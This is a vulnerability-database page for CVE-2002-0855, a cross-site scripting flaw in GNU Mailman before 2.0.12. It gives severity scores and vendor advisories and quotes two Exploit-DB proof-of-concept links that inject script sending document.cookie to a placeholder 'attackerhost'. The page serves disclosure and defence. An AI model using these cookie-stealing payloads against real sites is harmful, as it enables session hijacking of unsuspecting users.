CVE-2002-0855
published 2002-09-05CVE-2002-0855: Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription…
PriorityP430high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
6.11%
92.6th percentile
Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gnu | mailman | — | — |
CVSS provenance
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6wpg-628r-xfhr: Cross-site scripting vulnerability in Mailman before 2
ghsa_unreviewed·2022-04-30
CVE-2002-0855 [HIGH] GHSA-6wpg-628r-xfhr: Cross-site scripting vulnerability in Mailman before 2
Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.
Red Hat
security flaw
vendor_redhat·2002-07-11·CVSS 7.5
CVE-2002-0855 [HIGH] security flaw
security flaw
Cross-site scripting vulnerability in Mailman before 2.0.12 allows remote attackers to execute script as other users via a subscriber's list subscription options in the (1) adminpw or (2) info parameters to the ml-name feature.
No detection rules found.
Exploit-DB
GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting
exploitdb·2002-07-24
CVE-2002-0855 GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting
GNU Mailman 2.0.x - Admin Login Variant Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/5299/info
GNU Mailman is prone to a cross-site scripting vulnerability. An attacker may construct a malicious link to the administrative login page, which contains arbitrary HTML and script code.
A user visiting the link will have the attacker's script code executed in their web browser in the context of the site running the vulnerable software.
http://target/mailman_directory/admin/ml-name?adminpw="/onClick="window.open('http://attackerhost/attackerscript.cgi?'+document.cookie);
Exploit-DB
GNU Mailman 2.0.x - Subscribe Cross-Site Scripting
exploitdb·2002-07-24
CVE-2002-0855 GNU Mailman 2.0.x - Subscribe Cross-Site Scripting
GNU Mailman 2.0.x - Subscribe Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/5298/info
GNU Mailman is prone to a cross-site scripting vulnerability. Arbitrary HTML and script code are not sanitized from the URI parameters of mailing list subscribe scripts.
An attacker may exploit this issue by creating a malicious link containing arbitrary script code and enticing a web user to visit the link.
http://target/mailman/subscribe/ml-name?info=document.location%3D"http://attackerhost/attackerscript.cgi?"%2Bdocument.cookie;
http://archives.neohapsis.com/archives/bugtraq/2002-07/0268.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000522http://mail.python.org/pipermail/mailman-announce/2002-July/000043.htmlhttp://www.debian.org/security/2002/dsa-147http://www.iss.net/security_center/static/9985.phphttp://www.redhat.com/support/errata/RHSA-2002-176.htmlhttp://www.redhat.com/support/errata/RHSA-2002-177.htmlhttp://www.redhat.com/support/errata/RHSA-2002-178.htmlhttp://www.redhat.com/support/errata/RHSA-2002-181.htmlhttp://www.securityfocus.com/bid/5298http://archives.neohapsis.com/archives/bugtraq/2002-07/0268.htmlhttp://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000522http://mail.python.org/pipermail/mailman-announce/2002-July/000043.htmlhttp://www.debian.org/security/2002/dsa-147http://www.iss.net/security_center/static/9985.phphttp://www.redhat.com/support/errata/RHSA-2002-176.htmlhttp://www.redhat.com/support/errata/RHSA-2002-177.htmlhttp://www.redhat.com/support/errata/RHSA-2002-178.htmlhttp://www.redhat.com/support/errata/RHSA-2002-181.htmlhttp://www.securityfocus.com/bid/5298
2002-09-05
Published